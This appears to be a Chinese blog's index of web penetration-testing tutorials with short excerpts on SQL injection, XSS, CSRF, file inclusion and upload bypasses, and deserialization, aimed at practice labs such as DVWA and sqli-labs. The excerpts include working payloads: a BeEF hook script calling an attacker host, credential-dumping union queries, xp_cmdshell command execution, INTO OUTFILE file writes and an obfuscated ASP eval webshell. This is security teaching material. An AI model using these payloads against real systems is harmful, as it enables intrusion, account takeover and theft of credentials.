
渗透测试(web渗透)
文章平均质量分 71
渗透测试学习实战
bbq,
这个作者很懒,什么都没留下…
展开
-
2019OWASP漏洞top10
A1 注入 InjectionA2 失效的身份认证和会话管理A3 跨站脚本-XSSA4 直接引用不安全的对象 Insecurity Direct Object ReferenceA5 安全配置错误 Security MisconfigurationA6 敏感信息泄露 Sensitive Data ExposureA7 缺少功能级访问控制A8 跨站请求伪造 CSRFA9 使用含...原创 2020-04-13 19:25:41 · 8190 阅读 · 3 评论 -
web渗透里常见的逻辑漏洞
漏洞原理网站开发人员在建设网站的时候,由于验证不严格,造成的bug漏洞危害任意用户重置密码提权/越权任意金额购买验证码绕过…漏洞利用1.修改任意用户密码环境:自行搭建的登陆平台条件:修改密码时会发送修改的url到指定邮箱,并且此url长期有效(url包括用户名和令牌)漏洞复现1.正常注册一个用户,获取忘记密码时找回密码的url2.修改url里的用户名为其他用户,...原创 2020-03-04 14:34:38 · 2473 阅读 · 2 评论 -
typecho反序列化漏洞原理及复现过程
漏洞介绍Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理漏洞形成由于源码的以下几行存在反序列化漏洞与逻辑绕过,形成漏洞漏洞利用思路:由于install.php代码验证了finish参数,请求头HTTP_HOST,po...原创 2020-03-04 14:26:57 · 1739 阅读 · 2 评论 -
Struts2反序列化漏洞
介绍Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互漏洞环境vulhub/struts2/s2-048漏洞复现1.ubuntu选择vulhub-master/struts2/s2-048目录,输入docker-compose up -d启动环...原创 2020-03-04 14:23:41 · 2926 阅读 · 1 评论 -
web渗透之——PHP反序列化漏洞
漏洞原理PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通漏洞形成将用...原创 2020-03-04 14:21:57 · 959 阅读 · 1 评论 -
web渗透之——任意代码执行漏洞
漏洞原理当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞在php中:eval,assert,将字符串当成代码执行preg_replace("/wslp/e","$xr",“wslp”);用第二个参数的执行结果替换第三个参数里的第一个参数指定的值漏洞形成如果被执行的字符串是通过前端参数传过来的攻击代码,或者数据库里被植入攻击代码数据,就...原创 2020-03-04 14:19:10 · 1554 阅读 · 1 评论 -
web渗透之——命令执行漏洞
漏洞分类1.web代码层命令执行exec(“whoami”);2.第三方组件命令执行漏洞WordPress中用来处理图片的ImageMagick组件JAVA中的命令注入漏洞(struts2/ElasticsearchGroovy等)vBulletin 5.x 版本通杀远程代码执行3.系统层面命令执行漏洞MS08-067bash破壳漏洞漏洞原理日常的网络访问中,我们常常可以看到...转载 2020-03-04 14:17:26 · 1475 阅读 · 1 评论 -
xxe漏洞之——漏洞复现
漏洞介绍XXE全称XML External Entity Injection,也就是XML外部实体注入攻击,漏洞是对非安全的外部实体数据进行处理时引发的安全问题。要了解XXE,就必须懂得XML的一些规则。XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档...原创 2020-03-04 14:11:06 · 2384 阅读 · 1 评论 -
ssrf漏洞之——漏洞复现
漏洞介绍SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造url,由服务端对此url发起请求的一个安全漏洞。漏洞原理SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,并且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。一般情况下,SSRF访问的目标...原创 2020-03-04 14:08:55 · 3118 阅读 · 2 评论 -
CSRF漏洞之——漏洞复现
介绍CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRFCSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用普通用户的...原创 2020-03-04 14:03:43 · 3485 阅读 · 1 评论 -
xss漏洞之——XSS平台搭建
前言经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个:1.kali下的beef(1)kali命令行里输入beef-xss,得到一个脚本<script src="http://127.0.0.1:3000/hook.js"></script>将127.0.0.1改为kali的ip,之后进行植入(2)kali...原创 2020-03-04 13:57:57 · 5066 阅读 · 1 评论 -
xss漏洞之——XSS蠕虫、DDOS攻击
介绍通过构造的 XSS 代码,通过精心构造的 XSS 代码,可以实现非法转账、篡改信息、删除文章、自我复制等诸多功能。此处以更改密码为例代码:<img hidden src='http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Chang...原创 2020-03-04 13:53:04 · 2339 阅读 · 1 评论 -
xss漏洞之——钓鱼页面
1.重定向钓鱼:把当前页面重定向到一个钓鱼页面,此处使用百度测试代码:<script>document.location="http://www.baidu.com"</script>注入后效果:2.HTML 注入式钓鱼:使用 XSS 漏洞注入 HTML 或 JavaScript 代码到页面中代码(页面注入一个登陆界面,通过后台接收):<html&g...原创 2020-03-04 13:51:25 · 2637 阅读 · 1 评论 -
xss漏洞之——漏洞利用
1.获取cookie进行无密码登陆原理网页被植入网页被植入xss脚本,普通用户访问此网页时,会自动将用户本地的cookie缓存发送到指定远端服务器利用(1)首先登陆一个页面,抓包获取cookie(2)复制此页面里任一选项的url,重启浏览器后直接访问此url,抓包修改cookie为上面获取的登陆成功后的cookie(3)页面登陆成功,无需密码2.利用XSS漏洞获取管理员权限(获取...原创 2020-03-04 13:47:58 · 1317 阅读 · 2 评论 -
xss漏洞之——初识xss
xss介绍跨站脚本攻击一-XSS (Cross Site Script),指的是攻击者往Web页面或者URL里插入恶意JavaScript脚本代码,如果Web应用程序对于用户输入的内容没有过滤,那么当正常用户浏览该网页的时候,嵌入在Web页面里的恶意JavaScript脚本代码会被执行,从而达到恶意攻击正常用户的目的。攻击方式XSS攻击的代码是javas代码xss一般情况是植入到url或者...原创 2020-03-04 13:41:21 · 699 阅读 · 3 评论 -
文件包含漏洞之——防御措施
设置白名单代码在进行文件包含时,如果文件名可以确定,可以设置白名单对传入的参数进行比较。过滤危险字符由于Include/Require可以对PHP Wrapper形式的地址进行包含执行(需要配置php.ini),在Linux环境中可以通过”…/…/”的形式进行目录绕过,所以需要判断文件名称是否为合法的PHP文件。设置文件目录(配置php.ini)PHP配置文件中有open_basedir...原创 2020-03-04 13:35:32 · 3950 阅读 · 1 评论 -
文件上传漏洞之——漏洞进阶(读文件,写文件,包含图片马,包含日志文件,截断包含)
php协议PHP带有很多内置URL风格的封装协议,可用于类似fopen()、copy()、 file_ exists()和filesize()的文件系统函数file:// 访问本地文件系统http:// 访问HTTP(s)网址ftp:// 访问FTP(s)URLSphp:// 访问各个输入/输出流(I/o streams)zlib:// 压缩流data:// 数据(RFC2397)...原创 2020-03-04 13:32:35 · 4290 阅读 · 1 评论 -
文件上传漏洞之——远程文件包含漏洞(RFI)
定义如果php.ini的配置选项allow_url_include为On的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞,可以直接执行任意命令原理同本地文件包含原理,只是参数可以换成一个远程的url地址,此时包含的文件不能为php文件,可写成txt或者图片马等等文件包含的时候,无视文件格式,只要文件中有php代码,就会被执行复现dvwa lo...原创 2020-03-04 13:17:39 · 4886 阅读 · 4 评论 -
文件包含漏洞之——本地文件包含漏洞 (LFI)
定义能够读取或执行包含本地文件的漏洞,称为本地文件包含漏洞源代码原理为了方便,include等函数里放的不是一个指定文件,而是一个接收文件的变量,从而造成用户可以控制参数file改变这个变量当参数file 的值为一个指定路径的文件时,此时变量就是此路径,include函数就会执行此文件,当文件不是可执行的php文件时,就会将文件内容读取出货来,这样用户就可通过更改url里的参数进行读取...原创 2020-03-04 13:13:18 · 2638 阅读 · 1 评论 -
文件上传漏洞之——漏洞防御
1.将文件上传目录的所有用户执行权限全部取消只要web容器无法解析该目录下面的文件,即使攻击者上传了脚本文件,服务器本身也不会受到影响例:apache我们可以利用.htaccess(该文件一定要禁止.上传,否则被重写了解析规则,那么这种防御方式就不存在了)文件机制来对web server行为进行限制,有以下几种形式1.指定特定扩展名的文件的处理方式AddType text/plain ....原创 2020-03-04 13:08:57 · 1362 阅读 · 1 评论 -
文件上传漏洞之——二次渲染逻辑性漏洞绕过
漏洞形成二次渲染的缘分逻辑存在漏洞,先将文件上传,之后再判断,符合就保存,不符合删除,可利用条件竞争来进行爆破上传复现1.上传一个图片马,抓包,访问图片马,抓包,发送到inturde添加?a=1爆破点2.运行一万次,可看到有部分访问成功...原创 2020-03-04 13:03:12 · 2998 阅读 · 5 评论 -
文件上传漏洞之——利用条件竞争绕过
条件竞争漏洞.介绍条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同的请求时是并发进行的,因此如果并发处理不当或相关操作顺序设计的不合理时,将会导致此类问题的发生原理上传文件源代码里没有校验上传的文件,文件直接上传,上传成功后才进行判断:如果文件格式符合要求,则重命名,如果文件格式不符合要求,将文件删除由于服务器并发处理(同时)多个请求,假如a用户上传了木马文件,由于代码执行需要...原创 2020-03-04 12:56:50 · 5051 阅读 · 2 评论 -
文件上传漏洞之——upload-labs-master闯关游戏1-11关
1.将php文件后缀名改为jpg,之后bp抓包修改后缀名为php访问:3.上传一个phtml文件访问:5.修改文件后缀名为PHP访问:6.源代码有删除空格函数,bp抓包在文件名后加空格后点forward访问:7.在后缀名后加上:aaa访问:8.在后缀名后加上:aaa访问9.在后缀名后加上:aaa访问:10.双写php为pphphp访问:...原创 2020-03-04 12:44:17 · 1485 阅读 · 1 评论 -
文件上传漏洞之——利用js对php文件上传进行限制,并绕过
html代码<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Title</title></head><body><form action="zy1.php" onsubmit="re...原创 2020-03-04 12:38:13 · 1210 阅读 · 2 评论 -
sql注入之——mysql的四大基本注入手法
union类型的sql注入(联合查询注入)条件:页面必须有显示位判断列数:1’ order by 3-- -不存在返回错误判断显示位:-1’ union select 1,2,3-- -查看数据库:-1’ union select user(),database(),version()-- -查看数据库有哪些表 (爆数据表)table_schema='数据库名’-1’ u...原创 2020-03-04 12:26:41 · 1151 阅读 · 1 评论 -
sql注入之——mssql(sqlserver)执行系统命令
原理利用xp_cmdshell扩展存储过程,此存储过程可以直接执行系统命令开启xp_cmdshell扩展存储过程?id=1;use master;exec sp_configure ‘show advanced options’,1;reconfigure;exec sp_configure ‘xp_cmdshell’,1;reconfigure;执行系统命令?id=1;use mas...原创 2020-02-12 21:02:39 · 5648 阅读 · 3 评论 -
sql注入之——sqlserver报错注入
条件必须有错误回显函数convert(int,(select top 1 db_name() )):将第二个参数的值转换成第一个参数的int类型查看数据库?id=1 and 1=convert(int,(select top 1 db_name()))查看数据库有哪些表?id=1 and 1=convert(int,(select top 1 name from test.sys....原创 2020-02-12 20:52:50 · 1721 阅读 · 3 评论 -
sql注入之——sqlserver联合查询注入
条件:有显示位判断列数:?id=1 order by 3判断显示位:?id=1 union select null,null,null查看数据库:?id=1 union select 1,‘2’,db_name()这里注意1,‘2’,db_name()的数据类型必备与数据库存储的数据类型一致查看数据库有哪些表,U:用户的表?id=1 union select null,n...原创 2020-02-12 20:36:52 · 1760 阅读 · 1 评论 -
sql注入之——sqlmap使用
sqlmap基本使用获取一个url:http://localhost/sqli-labs-master/Less-1/?id=1判断是否有注入python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1”get型注入查看所有数据库:python sqlmap.py –u “http://localhost/sq...原创 2020-02-11 20:49:51 · 542 阅读 · 3 评论 -
sql注入之——常用绕过waf方式
1.参数污染原理:正则表达式一般只检测第一个参数,我们可以第一个参数放正常数据流量,第二个参数放攻击数据流量语句http://localhost/sqli-labs-master/Less-31/login.php/?id=1111&id=-1") union select 1,2,3-- -可以看到第二个参数执行sql语句成功,但第一个参数不可以,我们之后在1,2,3处替换sq...原创 2020-02-11 20:11:56 · 1938 阅读 · 2 评论 -
sql注入之——宽字节注入方法
使用条件有自动转义函数或全局变量(转义字符串中的特殊字符 '或"或)addslashes()mysqli_real_escape_string()mysql_escape_string()magic_quotes_gpc绕过1.数值型变量没有被符号包裹可直接注入:$id=1 and1=12.使用了gbk编码可以使用宽字节绕过原理:国标gbk编码中,汉字两个字节,英文、特殊字...原创 2020-02-11 19:31:18 · 824 阅读 · 1 评论 -
sql注入之——堆叠(多语句注入)
条件源代码使用musqli_multi_quiery();多语句查询函数,即可一次执行多条sql语句语句?id=1’;select “<?php phpinfo(); ?>” into outfile “D:\PHPKFGJ\phpstudy\PHPTutorial\WWW\213.php”-- -效果该目录下写入了213.php文件,可由此写入一些木马文件...原创 2020-02-10 19:55:02 · 1723 阅读 · 2 评论 -
sql注入之——二次注入
条件登陆:不能注入注册:不能覆盖,但可以知道有哪些用户,没有限制特殊符号,可注册admin-- -修改密码:各密码字段不能注入,修改密码时用户是自动获取当前用户原理(admin为一个已知用户)注册一个admin’-- -用户,使更改密码时获取用户后注释密码,达到admin’-- -用户更改admin密码步骤:1.注册一个admin’-- -用户2.更改admin’-- -用户密码...原创 2020-02-10 19:40:41 · 755 阅读 · 2 评论 -
sql注入之——读写文件,带外攻击
1.开启读文件权限在my.ini加上secure_file_priv=secure_file_priv=代表对文件读写没有限制secure_file_priv=NULL代表不能进行文件读写secure_file_priv=d:/…代表只能对改路径下文件进行读写2.读文件:函数:load_file();语句:?id=-1 union select 1,load_file(“d:\...原创 2020-02-10 19:22:02 · 1637 阅读 · 2 评论 -
sql注入练习之——sqli-labs 1-25
第一关:注入点:‘连接的字符串数据脱库:-1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3-- -第二关:注入点:数值型数据脱库:-1 union select 1,(select group_concat(concat_ws(0x7e,username,...原创 2020-02-10 18:45:46 · 3072 阅读 · 1 评论 -
sql注入之——mysql 联合查询注入
一、Dvwa low级别1.判断sql注入漏洞类型为:’为边界的字符串型2.判断列数和显示位:2列2个显示位 1' order by 23.确定数据库:1' union select 1,database()-- -4.查看数据库有哪些表:1' union select 2,(select group_concat(table_name) from informatio...原创 2020-01-06 23:54:06 · 570 阅读 · 1 评论 -
渗透测试基础之——火狐浏览器一些插件的使用
1.Flagfox:可以显示出网站所在地的国旗,以及显示网页的ip地址,域名,服务器位置等信息点击下面的小国旗2.Wappalyzer:是一款能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、JavaScript框架、编程语言等参数的chrome网站技术分析插件。3.Max HacKBar:web渗透时的经典工具4.user-agent switc...原创 2020-01-02 22:34:33 · 3792 阅读 · 2 评论 -
渗透测试基础之——burpsuite工具各模块的使用方法
Proxy模块:抓包1.首先开启intercept下的intercept is on进行抓包2.打开代理服务器,就可在此处显示浏览网页抓到的数据包点击forward,可以将拦截到的数据包释放,让数据进行传递。Repeater模块:多次存放请求响应和更改抓到的请求消息内容抓到数据包后点击Action,选择send to repeater ...原创 2020-01-02 21:56:29 · 1319 阅读 · 3 评论 -
使用中国菜刀(结合一句话木马)通过Iiswriter的put方法getshell
1.在客户端安装iiswrite软件,并关闭客户端防火墙2.服务器安装iis,勾选以下选项 3.更改iis网站的主目录,将所有权限都勾选,再将网址的权限里来宾账户的权限改为完全控制 4.在客户机使用iiswrite对服务器所在文夹件上传一个txt文件并改后缀为asp,内容为<%eval(eval(chr(114)+chr(101)...原创 2019-12-30 22:58:31 · 3645 阅读 · 1 评论